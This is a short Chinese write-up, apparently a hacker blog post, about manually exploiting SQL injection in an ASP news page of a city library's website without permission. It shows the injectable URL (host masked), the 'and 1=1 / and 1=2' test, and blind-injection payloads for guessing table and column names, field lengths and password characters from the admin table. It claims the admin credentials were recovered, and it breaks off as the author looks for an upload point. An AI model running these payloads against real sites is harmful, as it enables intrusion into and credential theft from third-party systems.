手动注入MSSQL---无聊中巧妙拿下某市的图书馆

不说了，无意中路过某图书馆的站，于是就顺便检测了下，因为是在网吧，所以就随便简单了看了下，这就发现了问题了,巧妙的拿下该站,没什么技术性,只不过感觉这样的站存在很多，所以隐患也很大。

首先看有没有存在注入没有，

http://www.xx.xx/ReadNews.asp?NewsID=447&BigClassName=动态&SmallClassName=馆内动态&SpecialID=0'

我们正常的注入,加个'后发现页面没有正常显示,于是我们就分析下地址的内容,我们发现NewsID=447于是我们就从447开始把后面的断掉，然后打开页面，可页面没有正常显示，于是我们又想到在447后加个单引号，这样发现页面错误显示，于是又and 1=1 and 1=2 最后证明存在注入,用工具把,这样的注入工具跑不出,于是就还是手工

猜表名 and (select count(*) from 表名)>0
猜列名 and (select count(列名) from 表名)>0
猜长度 and (select top 1 len(username) from admin)>5
username长 4
password长 16
猜内容 and (select top 1 asc(mid(passwd,1,1)) from admin)>50

我们分别利用以上的语句最后猜解出用户名和密码

我们寻找上传